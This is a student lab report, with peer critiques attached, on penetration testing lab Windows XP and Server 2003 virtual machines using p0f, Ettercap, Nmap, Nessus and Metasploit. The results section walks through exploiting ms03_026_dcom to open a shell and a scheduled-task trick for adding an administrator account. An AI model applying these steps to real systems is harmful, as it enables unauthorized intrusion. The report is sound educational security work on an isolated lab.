Abstract
When performing a penetration test on a system, after gathering all the information that you can, eventually you will need to incorporate some type of help to get through the security to reach your target. This requires knowledge of the tools and how they work. This lab will take everything done in the previous labs and determine which tools are needed to perform penetration tests on the testing environment that was set up in the first lab. This lab will show how to use tools to gather information on the operating system, open ports, applications running, and services running on the target computer. Then tools will be used to try and penetrate the target computer using vulnerabilities found in the target computer. This lab is the last lab that will teach how to do a penetration test before actually using the acquired skills to perform one in a real situation. This lab wraps up everything learned in the last labs and puts them to use on penetrating a target system.
Literature Review
In the paper Mobile Test: a tool supporting automatic blackbox tests for software on smart mobile devices, it is realized that any intelligent device that contains applications and a connection to the Internet could be exploited so testing must be done on mobile devices as well. The authors’ proposed mobile application testing program, Mobile Test used a layer design to isolate specific areas of the system that are to be tested( Bo, Xiang & Xiaoping, 2007,p.1). This was very much like the approach that was taken by the teams, for the teams have been isolating vulnerabilities by categorizing service vulnerabilities and tools by their location in the OSI model. The authors conducted blackbox testing on three different mobile devices that all used Symbain OS 8.0 and did a comparison test with three different tools or methods. This included the use of Mobile Test, Test Quest pro and manual testing (Bo et al., 2007, p.6).
Just as penetration testing needs to be performed on operating systems and user applications, this form of testing should also be conducted on security mechanisms. In the paper Firewall Penetration Testing (Haeni, 1997), in the abstract the author proposes a method of doing penetration testing on firewalls. He suggests that the people that should be doing the testing should be independent groups that could be trusted for integrity, experience, writhing skills and technical capabilities and not vendors or hackers. The penetration tests would be divided up into four steps: Indirect information collection, direct information collection, attacks from the outside, and attacks from the inside. The author makes it known that penetration tests on a firewall, this also pertains to penetration tests on anything, should not be an end all solution. Hackers come up with new ways to break through security block aids every day, so caution should be taken all the time. This previous statement is a very good statement to try and relate to anyone that is in charge of maintaining a network. It should be very clear to network administrators and also management that constant testing and maintenance on a network is vital in keeping a network secure. In the introduction the author explains that with the introduction of the internet anyone around the world could attack a network. He also explains how firewalls where created to block unwanted attacks from the outside. Firewalls should not be the only means of protection against the outside though. There should be introduction of proxies and other means of keeping malicious activity at bay. The author makes clear, again, the importance of not completely relying on the firewall to keep out malicious activities and that firewalls need to be constantly maintained to keep new attacks from slipping through. Also to make sure the firewall is secure, penetration tests need to be done on a regular schedule. Next the author explains where a firewall should be located on a network. He explains that the firewall should be one of the first devices encountered on the way into the network. The firewall should be placed between the network being protected and ether the outside or another untrusted network. I would like to add that any honey potted networks added to the network should not be connected to an actual network even with a properly secured firewall. These networks should be completely isolated from the actual network and treated as though they are completely separate networks. Next the author explains the difference in packet filtering gateways and application level gateways. He explains that these gateways are meant to filter unwanted traffic. In packet filtering, the author explains that these filters use header information to handle the decision of whether to let the packet through or not. The decision is based on a list of approved and disapproved addresses. Then the author explains that application level gateways, or proxy, are special purpose codes for each service to allow selected traffic through to the network. The author then gives a fairly complete explanation of how a firewall proxy works. The author seems to use the words firewall and proxy interchangeably. I disagree that these words are the same. A proxy can be used in other ways than being a firewall, so firewall and proxy should not be interchangeable. The writer then talks about some failures that are associated with firewalls. He mentions that a firewall adds to the number of points of failure. While this may be true, if one means of protection from the outside world goes down then you would have a second system to keep the network protected. The author makes a few comments on how a firewall can be quite costly and how a firewall can drag down the speed of the traffic on a network. In the next section the author gives some various ways that a firewall’s reliability could be tested. He suggests different approaches like firewall vendor information, examining logs, and design analysis. All these methods the author shows how they would be ether too time consuming, costly, or not a secure method. The one method that this paper is about that the author agrees with is firewall testing. The author then talks about how there are limitations to firewall testing in gathering information on firewall testing and tools needed to do the testing. This might be a moot point though today, sense this paper was written back in 1997. Today there are more tools and information on firewall penetration testing. The author again explains why independent companies would be a great decision for doing the penetration testing on the firewalls. This might be a good point to make, but this paper looks like it is trying to promote the authors business. The author then goes into explaining how to perform penetration testing, by explaining how to set the rules in the penetration testing. The author makes a note to be sure of the existence of other access to the network that the administration might not be aware of like dial in lines, ISDN connection, or T1 lines. These could be used to completely bypass the firewall altogether. Logging is also looked at in this article. The activities of all the connections made to the network need to be monitored and set to some alarm. I don’t believe that there is a fine line to the amount of traffic that can be monitored. If too much traffic is monitored, this could lead to a great amount of storage and processing power being utilized. If too little traffic is monitored then malicious activity could be overlooked. He also covers the idea of whether to tell the administrators of the test or not, and gives advantages and disadvantages to both. The methodology that the author uses to do the penetration testing on the firewalls is very similar to the methods that are used in these labs to do penetration testing on computers. The author uses four steps in the penetration testing that were mentioned above: indirect information gathering, direct information gathering, attacks from the outside, and attacks from the inside. For the step of indirect information gathering, this is a passive attack on the firewall by gathering information without alerting the organization the firewall belongs to. This can include scouring the internet and e-mails for information and also can include simple network tools like nslookup and whois. For a direct information gathering, the author used different scanning tools like SATAN and stealth scanning to find holes in the firewalls. The author also sends e-mail messages to the company users to see if he can get a response from the system with vital information on it. He also uses FIN and ACK packets to try and get a response from the system that would tell the author the system is listening. Next the author talks about attacks from the outside. The author breaks this step down into attacking packet filtering firewalls and application layer firewalls. He starts off with packet filtering firewalls by attacking the DMZ to see if he can gain access from those, because the system trusts the DMZs. The author then goes into an explanation of how to do an IP spoofing attack to gain access to a network behind a firewall. The problem with this today is that this requires flooding a host with packets. This today is commonly prevented with the protocols that are in place on networks and is a very old method to use. The author also explains non-blind IP spoofing, source porting and source routing to get through a firewall. As mentioned earlier these methods most likely will not work on today’s networks because these attacks are patched by default on systems today and will only work on systems that have not been updated for the past 10 years, which is most likely not the case. Next the author covers attacks against application layer firewalls. The author proposes an attack that involves taking control of a NTP server, causes the firewall to restart, and gives a false time from the NTP to the firewall thus allowing the attacker to use passwords gathered from past sniffing of the network to gain access. The author also covers some policies that should be examined for configuration errors to test for security breaches in policies. The author falls short in describing ways of doing attacks from inside the firewall. The author does a nice job explaining why someone would want to attack from the inside, but when it comes to explaining the attacks the author just says there a lot of tools available to do these attacks. The last part of this paper the author talks about how he did the actual tests. He describes that he used automated testing tools, but did not rely on those tools as the only means of securing a system. The author makes clear that the more the attacker knows about a system the better off in using more direct methods to attack a system. He also makes it clear that today hacking tools are becoming easier to find on the internet. Again this paper was written in 1997, so these tools in this paper are not reliable any more. In the conclusion the author mentions that there is not that much information out there on performing penetration attacks on firewalls. This statement is not true today. There is a lot of information on penetration testing on firewalls and tools that can be used on the tests. He also rehashes the idea that a penetration test on a firewall makes that firewall defiantly secure, but additional testing needs to be done on the system on a regular schedule. This article is a good guide into penetration testing, but should not be used as a means to doing a penetration test on firewalls, for the reason that this article is old and most everything in this article is now patched or defended against as a default on systems today.
Since security mechanisms could be tested, so could passwords. In the article Ethical Hacking and Password Cracking: a Pattern for Individualized Security Exercises (Snyder, 2006), is a paper on creating individualized learning exercises using a proposed pattern based on password cracking and SHA-1 file hashing. In the introduction the article describes how a quick review of hashing and password concepts will be covered using the author’s “SecureS” software system. The author makes clear in the introduction that the material covered in this paper should be used in an ethical manor. The rest of the introduction was on giving examples of ethical uses of password cracking. The next section just gives the details of the “SecureS” software the author of this paper had written. The section gives some details on the programs and features that are included in the software. The next section gives a description of what a hashed password is. In this section the author makes the mistake of repeating a whole paragraph. In the description of the different types of hashing methods the author leans toward the SHA1 method to hash passwords. This section of the article also explains the process of using one of the “SecureS” software features to demonstrate the hashing process. In the next section the article gives a good explanation of how passwords are encrypted and how password files containing encrypted passwords can be found on the internet by doing simple Google searches. The article also explains how these password files can be kept from being leaked out to the internet through a couple of tools. The next section takes the password files gathered and shows how tools like John the Ripper crack encrypted passwords. The problem with all this is that this requires the person trying to gain access to have access to the password files. The author then gives an exercise in cracking a set of passwords. One problem with the assignment is that the encrypted password is given to the student. This would be a very easy assignment, because all that needs to be done is to run the password through John the Ripper. Why not teach the students better on how to gain access to the password file? The next section of the article gives an example code that can guess passwords using a set of parameters imbedded in the code. The author makes the comment that “If the password is easily guessed, the password is secure. If the password is not easily guessed, it is more secure” (Snyder, 2006). I would disagree and say that if a password is easily guessed it should not be used and is not secure. If a password is not easily guessed it is secure. If a password is not guessed at all then it is a password to rely on (do not expect to get there though). The next section of the paper shows how the student goes about accomplishing the exercise. Examining this exercise, this does not look like an exercise in how to crack passwords but how to use John the Ripper and SHA-1 through the author’s own application. This exercise could have been expanded upon. The next section of the paper describes what the teacher needs to do to set up the exercise. This is done using an XML code to use a list of usernames and passwords to create a list of encrypted passwords. The rest of the paper gives the results of some students that had taken the exercises.
Penetration testing could be performed on operating systems, user applications, security mechanisms, why not test the network itself? In the paper Modeling TCP/IP Networks Topology for Network Vulnerability Analysis (Zakeri, et al. n. d.), the abstract explains that this article proposes a model to analyze TCP/IP networks against attacks. The abstract does a nice job in showing how a TCP/IP network lacks built-in mechanisms for authentication, integrity and privacy. The abstract does have some sentences that do not make sense though, like the last sentence in the abstract. The introduction does a nice job of explaining the idea that even though a piece of a network might be very secure, if the whole network is not secured then that piece of the network is not as secure as thought. The author states that because networks are increasing in size rapidly an automated approach to vulnerability analysis is needed. This makes a good point in countering what was said in (Haeni, 1997) about how automated scans cannot be a replacement to manual testing. Manual testing on a large network could take an infeasible amount of time to accomplish. Automated tools would alleviate this problem. It is good to note that still manual testing is still better at discovering hidden vulnerabilities than an automated approach. The author states that even though systematic approaches are starting to appear, a formal approach is lacking. This paper is about finding a formal approach to this problem. The author then goes on to explain that this paper will not cover the physical topology of a network, but extended concepts like: Logical representation of network devices interconnections, user access levels on network devices and hosts, services running on network devices and hosts, and related configuration of network devices. The paper then talks about the methodology of the proposed framework. This methodology is divided into two parts: Network topology model and vulnerability and attack model. Each of these models are defined in these sections. Every element in that category is defined and shown what is included in that element. Then using the defined elements the author gives a mathematical procedure to use the model to detect vulnerabilities in a network topology. This procedure is technical and needs to be studied to understand how it works. The author then goes into an example to demonstrate the model. This case study includes three hosts on a network. One host is sending information to a second host. Also on the network is a third host that is hijacking the information traveling from one host to another using a man in the middle attack. The author uses this case study to prove that the model can show that the network is vulnerable.
Because everything on a network including the network itself could be tested, there is a need to constantly improve the process of penetration testing. In the paper, Attack net penetration testing , the author described a new process model for penetration testing that used the Petri net as its paradigm, for this approach provided increased structure to flaw generation activities, without restricting the free range of inquiry(McDermott,2001,p.15). Penetration testing usually follows the flaw hypothesis or attack tree approach (McDermott, 2001, p.15). The attack tree approach was intended for penetration testing where there was less background information about the system to be tested(McDermott,2001,p.16). The author went on to describe an attack net as a Petri net with a set of places representing states or modes of the security relevant entities of the system of interest(McDermott, 2001, p.16). The attack net also has a set of transitions that represent input events, commands, or data that cause one or more security relevant entities to change state McDermott, 2001, p.16). Attack nets are not intended to model the actual behavior of a system or component during an attack, but are used as a notation for discovering and discussing scenarios under development (McDermott, 2001, p.19). Attack nets provide a graphical way of showing how a collection of flaws may be combined to achieve a significant system penetration (McDermott, 2001, p.21).The methodology used by the author was to apply an attack net to a case study about a Mitnick attack. The abstract was too short to give a sufficient overview of the paper. This paper related to the lab exercise in that it gives penetration testers a graphical solution to accomplish an attack.
Penetration testing relies heavily on tools to accomplish its tasks, the more tools that are available the better the testers are for finding vulnerabilities. In the article A Distributed Network Security Assessment Tool with Vulnerability Scan and Penetration Test (Chen, Yang, Lan, 2007) the authors propose a vulnerability scanning tool that they developed. The abstract in this article starts off by explaining why vulnerability testing is important in today’s networks. The abstract explains that the tool includes network mapping, vulnerability scanning, penetration testing, and intelligent reports. The article’s introduction explains how tools like Nessus and SATAN give a lot of false positives or they do not detect a vulnerability that does exist. The article proposes, in the introduction, a tool that combines vulnerability testing with penetration testing to uncover hidden vulnerabilities. This article was made to advertise a particular piece of software, so caution needs to be taken on reading this article and it needs to be looked at knowing there is a bias toward this software. The software has two components to it, the controller and the agent. The controller is a Windows application that sends commands out to each of the agents to perform cretin tasks and after the tasks are complete the agents then report results back to the controller. Each agent can perform network mapping, vulnerability testing, and penetration testing on various sections of a network. The author makes a note that the advantage of this software is that it uses the penetration testing to confirm the vulnerabilities that are found. This automates the entire process of vulnerability testing within this software. The paper then goes on to explain the configuration screens in the software. The configurations are separated into agent management and policy management. The agent management is used to configure the agents IP addresses, ports, and target network. The policy management is used to configure network mapping policy, vulnerability scan policy, and penetration policy. The paper goes into more definition of each of these, which will not be covered here. The last part gives a description of the reporting software. This piece of the software gives nice graphical representations of the vulnerabilities and penetration tests that were done on the network. The conclusion of this paper again emphasizes how important it is to incorporate penetration testing into vulnerability testing to get accurate results. The problem with this paper is that no were in this article does it talk about how, even if this piece of software is very accurate and complete, that this should not be used to deem a network secure. Like the (Haeni, 1997) paper states, security scanners can be of help in conducting tests, but cannot replace manual tests. This tool would be great to use in these labs to automate a penetration test against the network proposed in this lab, but this software should not be the only thing used. One last thing that the paper does not do is give any mention of the name of the software or where to get it.
Just as vulnerability scanning could be used for good via helping IT personnel what needs hardening, it could also be used for malicious intent. The article, A Taxonomy of DDoS Attack and DDoS Defense Mechanisms pertained to penetration testing because DDoS attacks scan target systems for vulnerabilities to determine if they could be exploited and commandeered so it could then be loaded with attack code and serve as a zombie to attack other systems. This could be done manually, semi-automatically, or automatically depending on the degree of reliance upon automation to recruit, exploit and infect zombie computers (Mirkovic &Reiher, 2004, p.39) Some of the tools used to perform such scans include worms and Trojans (Mirkovic et al., 2004, p.39) Some Trojans could take the form of root kits, which was described in the article, Root kits, an operating systems viewpoint. This article described root kits as tool boxes that contain a collection of highly skilled tools for attacking computer systems (Kuhnhauser, 2004, p.12). Root kits perform many of the same functions that the groups did upon their systems such as analyzing vulnerabilities within the target system, determining which tools would be best for exploiting the vulnerability, and covering up the attacker footprint on the target system but it differs in that it does this automatically. Root kits also create backdoors for reentry into the target systems, which goes beyond the scope of penetration testing. The article appeared to strictly a secondary source paper in which the author summarized the characteristics of root kits and security techniques to try to counteract these automated tools. Besides using scanning techniques to find recruits, DDoS attacks exploit vulnerabilities in specific protocols or applications on the victim’s network or computer system just like some of the tools that the groups have been working with. However, the DDoS attack exploits them just to deny access to these resources by the victim. While performing a DDoS attack is an option, the groups are being conditioned to take full control of the target systems.
Methodology
This lab will step through the process of actually doing a penetration test on three target computers set up by the first lab. The lab will go through reviewing literature on vulnerability testing, selecting tools to gather information on the target system, selecting tools to perform penetration testing using the gathered information, and discus what type of biases were found when performing the penetration tests on the three computers.
First in this lab, literature on vulnerability testing will be examined. This literature will aid the group in finding different methods to accomplish the vulnerability tests that are part of this lab. Each article will be examined and reviewed for important information that can be used in this lab, the types of methods that are used, the research that was used in each article, and any errors or omissions in the article.
This group is going to use three Windows environments to perform the penetration testing on. The three Windows environments are the Windows XP SP0, Windows SP 3, and Windows Server 2003. The first one that is going to be tested is the Window XP SP0. This operating system was chosen for the reason that it will be the easiest to penetrate, because of the lack of patches to fix the multitude of vulnerabilities in it. The group is starting off with the easiest operating system to hone our skills given that neither of us has ever done anything like this before and do not have any experience in penetration testing. The Windows XP SP0 system will allow us to see how a successful penetration test can be done without as much trouble in trying to find holes in the system. The group then will go on to the Windows Server 2003 operating system, because of the reason that this operating system has a lot more services and possible areas to discover vulnerabilities. Last the Windows XP SP3 will be tested, for the reason that it will be the hardest to get through. This is due to the fact that the service packs are up to date and all the vulnerabilities are fixed. The operating system that will be used to perform the penetration tests will be the Backtrack 3 operating system. The reason for this is that most of the tools that will be used are located on this operating system. The penetration testing is not going to be restricted to just being performed from the Backtrack 3 operating system though, because some tools operate better in a Windows environment.
The first step in performing a penetration test on a system is to gather information. In the beginning of this lab the objective is to take the first computer that was chosen, in this case the Windows XP SP0 operating system, and use tools to discover the operating system that is used on that computer. For this task the group chose to use the p0f tool for this job. This tool is designed just for the purpose of discovering the operating system on a target computer. The command line that was used was: p0f -i -S -r -p. This command will be ran from the Backtrack 3 operating system. The results are discussed below. The group also used Ettercap to confirm the operating systems. The results of those tests are also discussed below.
Next the group examined some tools in Backtrack 3 that could exploit the operating systems that were discovered in the previous exercise. The group started by examining vulnerabilities in the Windows XP SP0 operating system. A couple of tools that was found that could be used in penetrating the operating system were EZpwn and Fast Track. EZpwn and Fast Track are penetration testing tools that run through a list of exploits located in the Metasploit database and looks for any exploits that work. The group also manually tried various exploits from Metasploit to try and gain access to the Windows XP SP0 operating system. This process took almost all of a day to accomplish. This was due to the lack of experience in doing penetration testing and having to learn each tool we tried to use. The group tried exploits that did not use tools, to try and gain access into an administrator account from the physical machine also. This involved opening up a command prompt in a low level permission account, creating a scheduled task to open up an administrator access command prompt, and adding an administrator level account by which the group could then log onto. This was also tried on the Windows XP SP3 VM with negative results.
Next the group started in on trying to use the same techniques on the Windows Server 2003 SP2 VM. The group again attempted to use EZpwn and Fast Track to exploit the operating system. When these tests did not produce the required results, the group attempted to exploit possible open ports, like 21, 135, 137, and 445. Exploits like the ms06-040 exploit were tried on these ports. The group also tried accessing the server under a lower permissions account and gaining access by exploiting the registry to change the configurations of the operating system. Again, because lack in experience and knowledge of the tools the group was limited on what could be done to this operating system.
The last computer that the group examined was the Windows XP SP3 operating system. This operating system was looked at as being the hardest to penetrate due to all the patches that are installed on this operating system to fix vulnerabilities. The group again tried to use EZpwn and Fast Track to open a session to the operating system. Metasploit was updated to the newest exploits and the tests were tried again. The group then used Zenmap and Nessus to do a thorough vulnerability scan of the Windows XP SP3 operating system to uncover any vulnerabilities that might exist in the operating system with the newest patches. Nessus and Zenmap were ran several times against the operating system with different configurations and scans to maximize the ability to discover any vulnerabilities. ACK scans, FID scans, SYN scans, and others were used in scanning with the Zenmap tool. After a complete scan was done on the operating system, the group scoured the internet for vulnerabilities on the open ports and services running on the Windows XP SP3 operating system. Exploits on Metasploit and other exploits were used to try and exploit the open ports and services detected by the Nessus and Zenmap scans. As mentioned above the group also tried to access the computer from a lower level permission account using a scheduled task to open up an administrator level command prompt, but did not succeed.
The results of using the Nessus and Zenmap tools, in discovering vulnerabilities to exploit, were examined and compared to the way that the other operating systems were looked at. Last the group will examine the possibility of exploiting lower OSI layer levels to gain control of upper OSI model layers. This will give control of the computers from a lower layer which could be easier to accomplish.
Results
This lab has showed the group what is actually involved in trying to penetrate a computer. The group did have a disadvantage to this lab because of the lack of experience in penetration testing between all the members. The lab also has showed that sometimes if one way is not working, a step back from the situation and a fresh look at the problem will help in finding new ways of doing things. Also learned is that even though a penetration test is not successful in gaining access to a system, does not mean it is a failure. If a failure in gaining access to a computer through penetration testing fails, that might mean that the system is secure enough to prevent someone of the level of the penetration tester from gaining access. This does not mean that the system is completely secure, because there is no such thing as a totally secure system.
In the first part of the lab the three computers that were to be penetrated were tested to see if they would give up their operating system. After applying p0f and Ettercap, all three gave up an operating system. With both tests all but the Windows server 2003 SP2 operating systems were very close. The p0f tool was able to accurately detect both Windows XP VMs and get their service packs fairly close. The Windows 2003 SP VM was detected as a Windows 2000 SP 3 machine. The Ettercap program gave some different results than the p0f tool. With the Ettercap program a couple of the ports that were opened were also included in the results. The Windows XP VMs both were shown as either Windows XP Pro or Windows 2000 Pro computers. Ettercap did not reveal the service pack of either one. Ettercap got the Windows Server 2003 SP2 machine completely wrong. Ettercap showed this machine as an unidentified Linux machine. The results of these findings are found in figure 1 to figure 4 below.
Next the group then tried to penetrate the operating systems using the knowledge gained passively in the previous exercise. First the Windows XP SP0 machine was examined and a penetration test was done on it. This operating system was chosen, because of its lack of patches to fix vulnerabilities. One tool that was valued in trying to exploit these computers was the Metasploit Frame Work Version 3. This tool allowed the group to quickly try many exploits against the various machines. Another tool we discovered that automated the penetration testing and eliminated a lot of work was the EZpwn and Fast Track tools. These tools did a vulnerability test on the computer and applied exploits from the Frame Work Version 3 of Metasploit to test if the exploit would open up a session to that computer. EZpwn auto pawn tool was used against the Windows XP SP0 machine and a session was established using the ms03_026_dcom exploit. The session was started using the command “session -i 1” command. Then a channel was created using the command “execute -f cmd -c” and the connection was started by the command “interact 1”. This then gives a command prompt in the Windows XP SP0 shell were a file could be placed, a file could be deleted, or any other malicious activity could happen. A screenshot of this is given in figure 5. Other methods of gaining access without using a tool were examined. One exploit involved creating a batch file with one command in it “Command” in a lower permission account. This batch file was then used to create a scheduled task to open an administrator command prompt in a minute after the task was created. From the command prompt an administrator account was created to gain administrative privileges. This test was successful on the first day that it was tested, but was not successful after that.
Next the group attempted to gain access to the Windows Server 2003 SP2 machine using the techniques above and more. When the EZpwn and Fast Track tools were ran against the Windows Server 2003 machine, no sessions were established. Examining the information from EZpwn and Fast Track the group was able to gather some information on which ports were opened and what services were available. Ports 21, 135, 139, 445, 1025 were discovered to be opened. Scouring the internet the group was able to come up with some vulnerabilities on these ports. The vulnerabilities were exploited using Metasploit Frame Work 3. None of the exploits yielded any open sessions to connect to. Other tools were examined and tried on the operating system to produce some type of connection, but none gave a connection. Some of the tools we tried were medusa, hydra, Brutus, and a few others.
Last the Windows XP SP3 operating system was tested. This operating system was the hardest to attempt to penetrate. This was due to the amount of patches installed to fix the vulnerabilities. Like the other operating systems, EZpwn and Fast Track were tried on this one. After that a thorough scan of the Windows XP SP3 operating system was done using both Nessus and Nmap. These scans were done several times using different types of scans including SYN packet scans, FID packet scan, ACK packet scans, and others. The only ports that were discovered to be opened were ports 123 and 137. Other ports were also opened but were filtered. The group scoured the internet for vulnerabilities on these ports and came up short. Vulnerabilities that were found were already patched.
When looking at the results of doing these penetration tests even though Nessus and Nmap were used, these tools did not provide enough information that could have been used to exploit two of the three systems. When a plan was made up to penetrate a system that plan did not work on the next system, because that system was secured better.
When examining the tools and exploits that are used to perform these penetration tests almost all of them exist in layer 6 and 7. This means that most attacks on a computer are done from the application layer. This means that organizations are more concentrated on securing the upper layers on a system and do not look at security at lower layers as being a great threat. If this is the case then if an attack can be created at the lower layers then there would be less resistance. If a lower layer is attacked, that infection on the system will naturally travel up the OSI model. An example is; if the data in a packet is altered at a lower layer and sent on, because of the already attached protocols on that packet other layers are going to trust that packet and let it through to the upper layers. This can be alleviated by use of encryption at almost every layer. At the same time this amount of encryption can hinder speed.
Issues
Many issues were encountered in performing this lab. Throughout this lab it was discovered that a lot of tools did not accomplish what we expected them to do. A lot of time was taken learning how to use the selected tools and even learning how to install tools that were not already installed. Also, most of the time used in this lab was examining and researching what vulnerabilities could be used to exploit the systems. This lab was limited by the amount that was allotted. If enough time was given to penetrate a system like the Windows XP SP3 then the group could have discovered some way to gain access to that system. Another hindrance was the lack of knowledge of penetration tools, Linux environments, and knowledge of how penetration tests are done between the group members, greatly contributed in not succeeding in penetrating the computers.
Conclusion
By trying to exploit Windows XP Service Pack 0, Windows XP Service Pack 3 and Windows Server 2003, group four found that Windows XP Service pack 0 was relatively simple to exploit. The other two operating systems were virtually impossible to exploit via the use of script kiddies tools. The service packs installed on these systems have hardened these operating systems by turning off vulnerabilities that these tools rely heavily upon. This lab was ultimately a lesson of trial and error on the part of the tools. Though several of the tools did not work, this was still a good learning experience, for now we know many ways that would not successfully exploit a system.
References
Bo, J., Xiang, L. & Xiaoping, G. (2007). Mobile test: a tool supporting automatic blackbox tests for software on smart mobile devices. IEEE.
Chen, S. Yang, C. & Lan, S. (2007). A distributed network security assessment tool with vulnerability scan and penetration test.
Haeni, R. (1997).Firewall penetration testing.
Kuhnhauser, W. ( 2004). Root kits, an operating systems viewpoint.
McDermott, J.P. (2001). Attack net penetration testing.
Mirkovic, J &Reiher, P. (2004). A taxonomy of ddos attack and ddos defense mechanisms.ACM.
Snyder, R. (2006). Ethical hacking and password cracking: a pattern for individualized security exercises.ACM.
Zakeri, R., Shariari, H., Jalili, R, &Sadoddin, R. (n.d.) Modeling tcp/ip networks topology for network vulnerability analysis
The abstract presented by team four explains what will be accomplished in the lab. It does not meet the requirements of length of the syllabus. Anything less than two paragraphs will be judged as poor scholarship. They explain how lab six will be the last “learning” lab. I disagree, performing a live penetration test in this setting is still a learning exercise and a capstone to the course. The literature review presented by team four, is nothing more than an APA cited list of reviewed articles. They have three extremely long paragraphs in their literature review with very few citations. This makes the literature review very hard to read and comprehend. Considering the entire literature review, team four does not present a review that is scholarly or academic. They do not show the overall state of the literature nor do they do an effective job of tying the literature reviewed into the lab report process. The length of the literature review however is impressive. The methods section that is presented by team four does explain the process they will follow to complete the lab. They do list steps that should have actually been in the findings section though. Team four decided to penetrate all of the Windows VMs that are part of our lab. Unlike the other teams they do not even attempt to show anything related to the Linux machine in the lab environment. Because teams two, three, and five at least paid some respect to the Linux machine this calls into question the results provided by team four. The methods section does a good job of explaining the how of what they will be performing, they fail to mention the when, what and why. These are very important parts of an academic and scholarly literature review. Team four explains that they used p0f and ettercap to fingerprint their machines, but they fail to mention how they generated the packets used to actually fingerprint the machines. This is questionable. In the findings section of the lab they first list their lack of overall experience. This is a mistake as that information should be in the issues section. The use of tools other than just metasploit was a very nice touch as most of the other teams just worked with metasploit. They explain that because most exploits target the higher layers of the OSI model organizations are concerned with only protecting their data at the higher layers. I have to disagree with that statement. Organizations are worried about the security of their information; the layers of the OSI model never come into the picture. The issues that team four list are very accurate and complete unlike the issues presented by teams one and three. They actually list the inability to exploit two of their systems as an issue. Of course they do list a lack of experience as one of their issues. I do not believe this should be the case. After performing enough research, and as we are reaching the end of this course there should not be any issues as far as experience goes. I agree with team fours conclusions.
Group 4’s literature review, while quite lengthy, still doesn’t properly compare and contrast the literature to the lab activities. Each paper is given a paragraph that is, in most cases, a summary of the paper’s main ideas. The “Firewall Penetration Testing” paper was given a very extensive over view but only one reference was made to the current lab.
The methodologies section starts out with the group’s assessment of the security level of the versions of Windows they were going to test. XP SP0 was an obvious easy target but Server 2003 was classified as less secure than XP SP3 with little reason given besides speculation as to the number of services that would be running on Server 2003. The operating system identification using passive reconnaissance tools was done with little detail using a tool called “pof.” A link wasn’t provided so more information couldn’t be researched but I suspect that the tool uses active reconnaissance to fingerprint the target OS. The group gave some details about their testing but missed some key details. Various exploits from Metasploit were tried but which ones? The group appears to have taken the same approach to each system which failed consistently. Sufficient research would have turned up a few sites with step by step instructions for compromising an XP SP0 machine using Metasploit. When attempting the server 2003 machine, the group attempted to exploit ports 21, 135, 137, and 445 though they don’t give any detail on how they attempted to exploit them.
The findings section is a bit confusing. At first look, it appears to be a summary of the methodologies but while the methodologies make it sound like the XP SP0 machine was never compromised, the group says that they did compromise it using EXpwn. Also, the group mentions that they used Metasploit to exploit vulnerabilities in Server 2003 but none yielded any open sessions. If a session wasn’t opened, that means that the code injection didn’t work and the vulnerability wasn’t really, in fact, exploited. The group mentions that they researched the open ports on the Server 2003 virtual machine but doesn’t mention any of the specific vulnerabilities they discovered. The group mentions the issue of exploitation up the OSI stack and identifies that compromises of lower levels will exploit higher levels. One issue I had with this section of the findings is the proposed solution. The group suggests encryption at every layer. How would the system react to a compromise of the encryption at one of the layers? Encryption can only do so much and there must be trust between the layers that the lower layers have done their job. How would, for example, layer five understand that the IPSEC policy on layer three had been compromised? Layer five doesn’t “speak” IP or IPSEC, it trusts layer three to do that.
I do not agree with the first few sentences of this team’s abstract. You do not need to get some help to attack a target. Also you do not need knowledge of tools and how they work. Someone can just get their hands on the tools and start randomly attacking systems. Knowledge is not needed at all. Break up the paragraphs. This way you would meet the required length of the abstract as per the requirements given to us. The literature review reads like a list. Compare and contrast the articles. Just don’t state your point, cite it, and state how it relates to the lab experiment. It is quite obvious that this lab report was written by multiple people. BREAK UP your paragraphs. Having one long paragraph makes it very difficult for the reading to continue reading and not lose interest. For having a lot of information from the articles, they is not many citations. These are needed especially when taking for the articles. No date for any article is NEVER an option. Use the Internet to find this information, your team is the only one that has no date for articles.
The literature review is way too long. It is easily over the word count. Too much of the lab report is the literature review. Why does the team think that SP0 will be the easiest to compromise will the SP3 will be the hardest. I think that they could come up with that statement, especially when the team states that neither group member has done this before. Not many of the teams did not have the experience of penetration testing, but were still able to perform the lab experiment. The purpose of these labs is to teach the teams how to perform penetration testing. The team needed to go into more detail as to why they believe that exploiting the lower layers would make the next layer up more vulnerable. The lack of time should not be an issue. All teams had the same amount of time to perform the lab experiment, and they were able to get the lab experiment done. This team, like others, are disappointed that the exploits did not work for some of their environment. Failure is always an option. These labs should be teaching the teams how to perform penetration testing and how to protect systems properly.
Team 4 began their lab report with an abstract introducing this lab assignment. They state that their objective for this lab is to use tools to determine the vulnerabilities of a target system, and then use tools to try to penetrate the target system.
Team 4 begins their literature review section by discussing Mobile Test: a Tool Supporting Automatic Black Box Tests for Software on Mobile Devices. They related the layer design of Mobile Test to the layer design we have been using to classify vulnerabilities by the OSI model. This seemed to be an interesting comparison.
They continue their literature review with Firewall Penetration Testing (Haeni, 1997). They discuss who should perform the testing. They state that testing should be done by “independent groups that could be trusted for integrity, experience, writhing skills and technical capabilities and not vendors or hackers”. Although I agree with this statement, they used the word “writhing” where I believe they meant to use the term “writing”. There were a few other misspellings throughout the document; however I used this as an example. They proceed with the types of testing and the steps involved in testing. They related these types of testing and steps involved to our current laboratory assignment.
Next, team 4 discussed Ethical Hacking and Password Cracking: a Pattern for Individualized Security Exercises (Snyder, 2006). They discussed how passwords can be hashed by algorithms such as SHA-1. They also discussed password cracking programs such as John the Ripper. I believe that they did find a misstatement by the author of this article, “If the password is easily guessed, the password is secure..”. It would seem reasonable that if the password can be easily guessed, then it is not secure.
Team 4 also reviewed A Distributed Network Security Assessment Tool with Vulnerability Scan and Penetration Test (Chen, Yang, Lan, 2007). They began this review by stating, “Penetration testing relies heavily on tools to accomplish its tasks, the more tools that are available the better the testers are for finding vulnerabilities.” I don’t necessarily agree with this statement. I believe that the knowledge of the tester is the key, not the number of tools that are available. I found it ironic that team 4 states that the article was designed to advertise a particular piece of software and that caution need to be taken on reading the article, however they state at the end that the author of the articles does not give the name of the software or where it can be obtained. This is either very poor marketing on the part of the author of the article, or the article was meant to document their work and not meant as an advertisement.
In the methodology section, Team 4 discussed the methods that they used for conducting the testing and the results of the testing. They used pof and Ettercap to determine the operating system. They also used EZpwn, Fast Track, and various tools within the Metasploit framework to attempt to gain access, however had negative results. They then used Zenmap and Nessus to try to uncover any further vulnerabilities, but had negative results. In their results section they basically restate the methods and the results that they stated in the methods section.
